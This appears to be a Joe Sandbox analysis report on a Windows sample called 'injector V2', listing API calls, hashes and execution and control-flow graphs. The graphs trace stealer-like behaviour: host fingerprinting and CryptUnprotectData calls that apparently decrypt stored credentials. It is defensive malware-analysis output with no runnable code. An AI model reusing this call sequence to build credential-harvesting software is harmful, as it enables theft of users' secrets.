                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CatchEncodePointer
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 1435073870-2084237596
                                                                                    • Opcode ID: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
                                                                                    • Instruction ID: e7116953e758f5c15904211e6723982d2739256a9870b911120c3226cebb4c9b
                                                                                    • Opcode Fuzzy Hash: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
                                                                                    • Instruction Fuzzy Hash: 9F414671A01209AFDF25CF98C981AAEBBF5FF09305F1880D9FA0467222E3359A55DB50
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 00B50C2F
                                                                                    • GetLastError.KERNEL32 ref: 00B50C39
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00B50C61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3177248105-2084034818
                                                                                    • Opcode ID: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
                                                                                    • Instruction ID: e7ef1ec7c678c422d43911c49b3d9fb70e400363d08cc35714257f308a0f70a9
                                                                                    • Opcode Fuzzy Hash: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
                                                                                    • Instruction Fuzzy Hash: 3FE01A30680308BAEA212BA5ED46B1A3F9AEB01B42F1040E0FD0CAC0A1EBA299559584
                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00B515E2
                                                                                      • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B51834
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B5187A
                                                                                    • GetLastError.KERNEL32 ref: 00B5191D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                    • String ID:
                                                                                    • API String ID: 2112829910-0
                                                                                    • Opcode ID: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
                                                                                    • Instruction ID: d76d7660a7a8e0b50ab572c5f483a359158408b4c544443337649b5db093b239
                                                                                    • Opcode Fuzzy Hash: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
                                                                                    • Instruction Fuzzy Hash: D7D16BB5D002489FDB15CFA8D880BEDBBF5EF09311F2849AAE865EB251D730A945CB50
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer
                                                                                    • String ID:
                                                                                    • API String ID: 1740715915-0
                                                                                    • Opcode ID: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
                                                                                    • Instruction ID: 011f415e91e5e5b69ac81c9ec62745c7eed27363568d33de7b20805fe90502ee
                                                                                    • Opcode Fuzzy Hash: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
                                                                                    • Instruction Fuzzy Hash: 3E511372A022029FDB2A8F14E891B7AB7E4FF16312F1444EDED05972A1E731ED49D790
                                                                                    APIs
                                                                                      • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00B4F8B4,?,?,?,00000000), ref: 00B4F572
                                                                                    • __dosmaperr.LIBCMT ref: 00B4F579
                                                                                    • GetLastError.KERNEL32(00000000,00B4F8B4,?,?,00000000,?,?,?,00000000,00000000,?,00B4F8B4,?,?,?,00000000), ref: 00B4F5B3
                                                                                    • __dosmaperr.LIBCMT ref: 00B4F5BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1913693674-0
                                                                                    • Opcode ID: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
                                                                                    • Instruction ID: 76521a857f5b0832f7d109ff8ab0f8d3037f6269f7ac3451eb492d8c058b6502
                                                                                    • Opcode Fuzzy Hash: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
                                                                                    • Instruction Fuzzy Hash: 2321A771600617AFDB10AF658C8197BB7E9FF2436471085B9F86997250DB30EF40ABA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
                                                                                    • Instruction ID: be1db36567d3007cda6b4feda3c6a409c000ac073bafaa49c81cf6002918b56e
                                                                                    • Opcode Fuzzy Hash: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
                                                                                    • Instruction Fuzzy Hash: D5216A71600217AF9F20AFB5CCA1D7BB7E9EF0136471185B5F86997251DB30EE00ABA1
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00B50212
                                                                                      • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5024A
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5026A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 158306478-0
                                                                                    • Opcode ID: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
                                                                                    • Instruction ID: 12d92b183119b71e6ad47d4cc7f8598abb6e544062f5b1b315ee1bfb4c76b93a
                                                                                    • Opcode Fuzzy Hash: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
                                                                                    • Instruction Fuzzy Hash: 0011E1A2511A167E671137729CCEE6F6EEDDE86396B1004E4FC02A2102EEB1CE059575
                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000), ref: 00B54417
                                                                                    • GetLastError.KERNEL32(?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?,?,00B512B7,00000000), ref: 00B54423
                                                                                      • Part of subcall function 00B54480: CloseHandle.KERNEL32(FFFFFFFE,00B54433,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?), ref: 00B54490
                                                                                    • ___initconout.LIBCMT ref: 00B54433
                                                                                      • Part of subcall function 00B54455: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B543F1,00B53BCF,?,?,00B51971,?,00000000,00000000,?), ref: 00B54468
                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?), ref: 00B54448
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
                                                                                    • Instruction ID: 43e1885cc9900822d50aae56e1f10bc73f010811f840e38796b0312f8d1d34ac
                                                                                    • Opcode Fuzzy Hash: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
                                                                                    • Instruction Fuzzy Hash: 6AF09836540215BFCF221FD5AC09B993F6AEB087A6F054190FE1896230DF7288A0EB90
                                                                                    APIs
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00B52265
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___except_validate_context_record
                                                                                    • String ID: csm$csm
                                                                                    • API String ID: 3493665558-3733052814
                                                                                    • Opcode ID: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
                                                                                    • Instruction ID: 40a31173d2aec64bc69540581e6911f60949990bdecf3b5e977b2c018a296dfd
                                                                                    • Opcode Fuzzy Hash: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
                                                                                    • Instruction Fuzzy Hash: 2231CF36502205DFCF228F50CC40B6E7BA5FF0A316F1841DAFC584A121C336C9AADB85

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.3%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:40.8%
                                                                                    Total number of Nodes:245
                                                                                    Total number of Limit Nodes:18
                                                                                    execution_graph 12062 408d80 12063 408d8f 12062->12063 12064 408f82 ExitProcess 12063->12064 12065 408d97 SHGetSpecialFolderPathW 12063->12065 12066 408dad 12065->12066 12067 408db5 GetCurrentThreadId GetCurrentProcessId 12066->12067 12068 408f7d 12066->12068 12069 408de4 GetForegroundWindow 12067->12069 12077 43e3b0 12068->12077 12072 408ed6 12069->12072 12072->12068 12076 40cdc0 CoInitializeEx 12072->12076 12080 43ff60 12077->12080 12079 43e3b5 FreeLibrary 12079->12064 12081 43ff69 12080->12081 12081->12079 12082 43bd00 12083 43bd30 12082->12083 12083->12083 12084 43bd9e 12083->12084 12092 43e480 LdrInitializeThunk 12083->12092 12084->12084 12085 43bf71 12084->12085 12093 43bbc0 12084->12093 12089 43be2a 12091 43beaf 12089->12091 12096 43e480 LdrInitializeThunk 12089->12096 12097 43bc40 12091->12097 12092->12084 12094 43bbe0 12093->12094 12094->12094 12095 43bc1f RtlAllocateHeap 12094->12095 12095->12089 12096->12091 12098 43bc59 RtlFreeHeap 12097->12098 12099 43bced 12097->12099 12098->12099 12099->12085 12309 436fe0 12310 437010 12309->12310 12312 437065 12310->12312 12313 43e480 LdrInitializeThunk 12310->12313 12313->12310 12101 42e986 12107 440420 12101->12107 12103 42e9a5 GetComputerNameExA 12104 42ea00 GetComputerNameExA 12103->12104 12106 42eaf0 12104->12106 12108 440450 12107->12108 12108->12103 12108->12108 12326 441620 12327 441640 12326->12327 12328 44168e 12327->12328 12336 43e480 LdrInitializeThunk 12327->12336 12329 43bbc0 RtlAllocateHeap 12328->12329 12333 4418ad 12328->12333 12331 441706 12329->12331 12335 44177f 12331->12335 12337 43e480 LdrInitializeThunk 12331->12337 12332 43bc40 RtlFreeHeap 12332->12333 12335->12332 12336->12328 12337->12335 12338 40ce25 12339 40ce50 12338->12339 12342 4394c0 12339->12342 12341 40ce8c 12344 439520 CoCreateInstance 12342->12344 12345 4395e1 SysAllocString 12344->12345 12346 439b8a 12344->12346 12349 439686 12345->12349 12348 439b9a GetVolumeInformationW 12346->12348 12356 439bb1 12348->12356 12350 439692 CoSetProxyBlanket 12349->12350 12351 439b76 SysFreeString 12349->12351 12352 4396b2 SysAllocString 12350->12352 12353 439b6c 12350->12353 12351->12346 12355 4397b0 12352->12355 12353->12351 12355->12355 12357 4397db SysAllocString 12355->12357 12356->12341 12359 439802 12357->12359 12358 439b56 SysFreeString SysFreeString 12358->12353 12359->12358 12360 43984a VariantInit 12359->12360 12362 439b48 12359->12362 12363 4398b0 12360->12363 12361 439b37 VariantClear 12361->12362 12362->12358 12363->12361 12364 43802a 12366 438042 12364->12366 12365 438057 GetUserDefaultUILanguage 12367 43807a 12365->12367 12366->12365 12109 40dbca 12110 40dbe0 12109->12110 12112 40dc58 12110->12112 12150 43e480 LdrInitializeThunk 12110->12150 12114 40dcfe 12112->12114 12151 43e480 LdrInitializeThunk 12112->12151 12123 425cd0 12114->12123 12116 40dd66 12127 428690 12116->12127 12124 425d70 12123->12124 12124->12124 12126 425f23 12124->12126 12159 421400 12124->12159 12126->12116 12128 4286c0 12127->12128 12130 42870e 12128->12130 12193 43e480 LdrInitializeThunk 12128->12193 12129 40ddaf 12137 428b20 12129->12137 12130->12129 12132 43bbc0 RtlAllocateHeap 12130->12132 12134 42877a 12132->12134 12133 43bc40 RtlFreeHeap 12133->12129 12135 4287ee 12134->12135 12194 43e480 LdrInitializeThunk 12134->12194 12135->12133 12195 428b40 12137->12195 12150->12112 12151->12114 12163 421410 12159->12163 12160 421504 12162 4214e1 12160->12162 12169 423920 12160->12169 12162->12126 12163->12160 12163->12162 12165 440fc0 12163->12165 12167 440fe0 12165->12167 12166 44111e 12166->12160 12167->12166 12184 43e480 LdrInitializeThunk 12167->12184 12185 440e30 12169->12185 12171 42410b 12171->12162 12172 423963 12172->12171 12173 43bbc0 RtlAllocateHeap 12172->12173 12174 4239a1 12173->12174 12182 423a33 12174->12182 12189 43e480 LdrInitializeThunk 12174->12189 12176 43bc40 RtlFreeHeap 12178 424079 12176->12178 12177 43bbc0 RtlAllocateHeap 12177->12182 12178->12171 12191 43e480 LdrInitializeThunk 12178->12191 12179 423b05 12179->12176 12182->12177 12182->12179 12183 43bc40 RtlFreeHeap 12182->12183 12190 43e480 LdrInitializeThunk 12182->12190 12183->12182 12184->12166 12186 440e50 12185->12186 12187 440f6e 12186->12187 12192 43e480 LdrInitializeThunk 12186->12192 12187->12172 12189->12174 12190->12182 12191->12178 12192->12187 12193->12130 12194->12135 12197 428bb6 12195->12197 12198 428c2e 12197->12198 12201 43bd00 12197->12201 12211 43c460 12198->12211 12202 43bd30 12201->12202 12202->12202 12203 43bd9e 12202->12203 12219 43e480 LdrInitializeThunk 12202->12219 12203->12203 12204 43bf71 12203->12204 12205 43bbc0 RtlAllocateHeap 12203->12205 12204->12197 12208 43be2a 12205->12208 12207 43bc40 RtlFreeHeap 12207->12204 12210 43beaf 12208->12210 12220 43e480 LdrInitializeThunk 12208->12220 12210->12207 12213 43c4b0 12211->12213 12212 428cc6 12218 43c51e 12213->12218 12221 43e480 LdrInitializeThunk 12213->12221 12215 43cba2 12215->12212 12222 43e480 LdrInitializeThunk 12215->12222 12217 43e480 LdrInitializeThunk 12217->12218 12218->12212 12218->12215 12218->12217 12219->12203 12220->12210 12221->12218 12222->12212 12368 42dc2f 12369 42dc60 12368->12369 12369->12369 12370 42dd2e 12369->12370 12372 43e480 LdrInitializeThunk 12369->12372 12372->12370 12373 40de2f 12378 434a10 12373->12378 12375 40de35 12376 40de44 CoUninitialize 12375->12376 12377 40de70 12376->12377 12379 434a3e GetSystemMetrics GetSystemMetrics 12378->12379 12380 434a81 12379->12380 12223 431f13 CoSetProxyBlanket 12381 40daf0 12383 40db10 12381->12383 12382 40db7a 12383->12382 12385 43e480 LdrInitializeThunk 12383->12385 12385->12382 12386 42e573 12388 42e590 12386->12388 12387 42e62b FreeLibrary 12389 42e995 12387->12389 12388->12387 12388->12388 12390 42e9a5 GetComputerNameExA 12389->12390 12391 42ea00 GetComputerNameExA 12390->12391 12393 42eaf0 12391->12393 12224 423550 12225 42355e 12224->12225 12227 4235a0 12224->12227 12228 423660 12225->12228 12229 423670 12228->12229 12229->12229 12230 440fc0 LdrInitializeThunk 12229->12230 12231 42373f 12230->12231 12232 43e3d0 12233 43e463 12232->12233 12234 43e3fa RtlReAllocateHeap 12232->12234 12235 43e458 12232->12235 12236 43e3ec 12232->12236 12238 43bc40 RtlFreeHeap 12233->12238 12240 43e45e 12234->12240 12237 43bbc0 RtlAllocateHeap 12235->12237 12236->12233 12236->12234 12237->12240 12238->12240 12394 40cdf3 CoInitializeSecurity 12395 439130 12397 439158 12395->12397 12399 43924a 12397->12399 12404 43e480 LdrInitializeThunk 12397->12404 12400 43933d 12399->12400 12402 43945a 12399->12402 12403 43e480 LdrInitializeThunk 12399->12403 12400->12402 12405 43e480 LdrInitializeThunk 12400->12405 12403->12399 12404->12397 12405->12400 12241 441510 12242 441530 12241->12242 12243 4415ef 12242->12243 12245 43e480 LdrInitializeThunk 12242->12245 12245->12243 12247 425655 12248 42565d 12247->12248 12249 440fc0 LdrInitializeThunk 12248->12249 12255 425791 12249->12255 12250 425927 12251 423920 3 API calls 12250->12251 12252 425ae8 12250->12252 12251->12252 12252->12252 12253 425911 GetLogicalDrives 12254 440fc0 LdrInitializeThunk 12253->12254 12254->12250 12255->12250 12255->12252 12255->12253 12255->12255 12256 42eed9 12257 42ef10 12256->12257 12258 42f03b GetPhysicallyInstalledSystemMemory 12257->12258 12259 42f068 12258->12259 12259->12259 12260 41941e 12261 419429 12260->12261 12262 440e30 LdrInitializeThunk 12261->12262 12285 419465 12261->12285 12263 4195ad 12262->12263 12264 4195cf 12263->12264 12268 4197c5 12263->12268 12270 419868 12263->12270 12272 41960c 12263->12272 12290 441170 12263->12290 12264->12268 12264->12270 12264->12272 12294 441240 12264->12294 12268->12272 12300 43e480 LdrInitializeThunk 12268->12300 12270->12270 12271 440e30 LdrInitializeThunk 12270->12271 12273 4199ed 12271->12273 12272->12272 12274 419a39 12273->12274 12275 441170 LdrInitializeThunk 12273->12275 12277 419a91 12273->12277 12273->12285 12286 419b3e 12273->12286 12276 441240 LdrInitializeThunk 12274->12276 12274->12277 12274->12285 12274->12286 12275->12274 12276->12277 12277->12285 12277->12286 12301 43e480 LdrInitializeThunk 12277->12301 12280 419f09 12281 41a320 12280->12281 12282 41a084 12280->12282 12280->12285 12288 41a1b2 12280->12288 12284 41e330 3 API calls 12281->12284 12303 41e330 12282->12303 12283 419edf CryptUnprotectData 12283->12280 12283->12286 12284->12285 12286->12280 12286->12283 12302 43e480 LdrInitializeThunk 12286->12302 12288->12281 12288->12285 12288->12288 12289 440fc0 LdrInitializeThunk 12288->12289 12289->12288 12292 4411a0 12290->12292 12291 4411ee 12291->12264 12292->12291 12306 43e480 LdrInitializeThunk 12292->12306 12295 441270 12294->12295 12295->12295 12297 4412be 12295->12297 12307 43e480 LdrInitializeThunk 12295->12307 12298 4195fd 12297->12298 12308 43e480 LdrInitializeThunk 12297->12308 12298->12268 12298->12270 12298->12272 12300->12272 12301->12286 12302->12286 12304 41e355 12303->12304 12305 418eb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 12304->12305 12305->12304 12306->12291 12307->12297 12308->12298

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 4394c0-43951b 1 439520-439569 0->1 1->1 2 43956b-439586 1->2 4 439590-4395db CoCreateInstance 2->4 5 439588 2->5 6 4395e1-439626 4->6 7 439b8a-439baf call 440420 GetVolumeInformationW 4->7 5->4 8 439630-439654 6->8 12 439bb1-439bb5 7->12 13 439bb9-439bbb 7->13 8->8 10 439656-43968c SysAllocString 8->10 18 439692-4396ac CoSetProxyBlanket 10->18 19 439b76-439b86 SysFreeString 10->19 12->13 14 439bd7-439bde 13->14 16 439be0-439be7 14->16 17 439bea-439c2f call 4201f0 14->17 16->17 25 439c30-439c38 17->25 21 4396b2-4396cf 18->21 22 439b6c-439b72 18->22 19->7 24 4396d0-439727 21->24 22->19 24->24 26 439729-4397af SysAllocString 24->26 25->25 27 439c3a-439c3c 25->27 28 4397b0-4397d9 26->28 29 439bc0-439bd1 27->29 30 439c3e-439c4e call 408690 27->30 28->28 31 4397db-439808 SysAllocString 28->31 29->14 32 439c53-439c5a 29->32 30->29 36 439b56-439b68 SysFreeString * 2 31->36 37 43980e-439830 31->37 36->22 39 439836-439839 37->39 40 439b4c-439b52 37->40 39->40 41 43983f-439844 39->41 40->36 41->40 42 43984a-4398a1 VariantInit 41->42 43 4398b0-43990b 42->43 43->43 44 43990d-439926 43->44 45 43992a-43992c 44->45 46 439932-43993b 45->46 47 439b37-439b48 VariantClear 45->47 46->47 48 439941-439952 46->48 47->40 50 439954-43995b 48->50 51 43998d 48->51 53 43996c-439970 50->53 52 43998f-4399ac call 408610 51->52 62 439ae3-439af7 52->62 63 4399b2-4399bc 52->63 55 439972-43997b 53->55 56 439960 53->56 59 439982-439986 55->59 60 43997d-439980 55->60 58 439961-43996a 56->58 58->52 58->53 59->58 61 439988-43998b 59->61 60->58 61->58 65 439af9 62->65 66 439afe-439b0d 62->66 63->62 64 4399c2-4399cf 63->64 67 4399d0-4399da 64->67 65->66 68 439b14-439b34 call 408640 call 408620 66->68 69 439b0f 66->69 70 4399f0-4399f6 67->70 71 4399dc-4399e4 67->71 68->47 69->68 74 439a35-439a41 70->74 75 4399f8-4399fb 70->75 73 439a15-439a17 71->73 81 439a19-439a1d 73->81 78 439a43-439a46 74->78 79 439a96-439a9e 74->79 75->74 80 4399fd-439a12 75->80 78->79 83 439a48-439a94 78->83 84 439aa0-439aa2 79->84 85 439aa7-439aac 79->85 80->73 86 439a20-439a26 81->86 83->81 84->86 87 439ad9-439ade 85->87 88 439aae-439ad4 85->88 86->62 89 439a2c-439a2e 86->89 87->81 88->81 89->67 90 439a30 89->90 90->62
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(00444678,00000000,00000001,00444668,00000000), ref: 004395D3
                                                                                    • SysAllocString.OLEAUT32(598B5B92), ref: 0043965B
                                                                                    • CoSetProxyBlanket.COMBASE(4740E3A3,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004396A4
                                                                                    • SysAllocString.OLEAUT32(M'U!), ref: 0043972E
                                                                                    • SysAllocString.OLEAUT32(M'U!), ref: 004397DC
                                                                                    • VariantInit.OLEAUT32(?), ref: 00439852
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                    • String ID: &u)w$8e#g$;y.{$C$M'U!$Pq4s$\
                                                                                    • API String ID: 65563702-1931860412
                                                                                    • Opcode ID: 3131e6d7beb5a08458c71a3d03e2f04a7d785c70cb91973e330a3a6039f6e485
                                                                                    • Instruction ID: abd9ad4aa2cd1e615a1ea83e1953b3a13448af8400c9208da3b8f5b1455d5226
                                                                                    • Opcode Fuzzy Hash: 3131e6d7beb5a08458c71a3d03e2f04a7d785c70cb91973e330a3a6039f6e485
                                                                                    • Instruction Fuzzy Hash: 9A220F72A083519BD710CF64C881B5BFBE4EF89714F148A2EE9959B391D3B8DC05CB86

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
